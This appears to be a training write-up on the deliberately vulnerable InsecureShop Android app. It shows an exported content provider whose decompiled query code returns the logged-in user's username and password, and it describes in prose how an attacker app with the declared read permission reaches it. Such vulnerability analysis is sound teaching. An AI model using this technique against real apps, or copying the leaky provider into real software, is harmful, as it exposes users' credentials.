Insecure Content Provider
The Content Provider
com.insecureshop.contentProvider.InsecureShopProvider
is exported due to the presence of flag android:exported="true"
.<provider android:name="com.insecureshop.contentProvider.InsecureShopProvider" android:readPermission="com.insecureshop.permission.READ" android:exported="true" android:authorities="com.insecureshop.provider"/>
The content provider
com.insecureshop.contentProvider.InsecureShopProvider
contains the following code:public boolean onCreate() {
android.content.UriMatcher uriMatcher2 = new android.content.UriMatcher(-1);
uriMatcher = uriMatcher2;
if (uriMatcher2 == null) {
return true;
}
uriMatcher2.addURI("com.insecureshop.provider", "insecure", 100);
return true;
}
public android.database.Cursor query(android.net.Uri uri, java.lang.String[] projection, java.lang.String selection, java.lang.String[] selectionArgs, java.lang.String sortOrder) {
kotlin.jvm.internal.Intrinsics.checkParameterIsNotNull(uri, "uri");
android.content.UriMatcher uriMatcher2 = uriMatcher;
if (uriMatcher2 == null || uriMatcher2.match(uri) != 100) {
return null;
}
android.database.MatrixCursor cursor = new android.database.MatrixCursor(new java.lang.String[]{"username", "password"});
java.lang.String[] strArr = new java.lang.String[2];
java.lang.String username = com.insecureshop.util.Prefs.INSTANCE.getUsername();
if (username == null) {
kotlin.jvm.internal.Intrinsics.throwNpe();
}
strArr[0] = username;
java.lang.String password = com.insecureshop.util.Prefs.INSTANCE.getPassword();
if (password == null) {
kotlin.jvm.internal.Intrinsics.throwNpe();
}
strArr[1] = password;
cursor.addRow(strArr);
return cursor;
}
If the content provider matches the URI
insecure
, then it allows us to access username
and password
of the logged-in user.Exploiting this is not really straightforward. You need to create an android app as it cannot be exploited using adb or drozer. The reason is that the Content provider can only be accessed with the defined permission "android:readPermission". You need to add this permission in Attacker's "AndroidManifest.xml" file in order to access the Content Provider.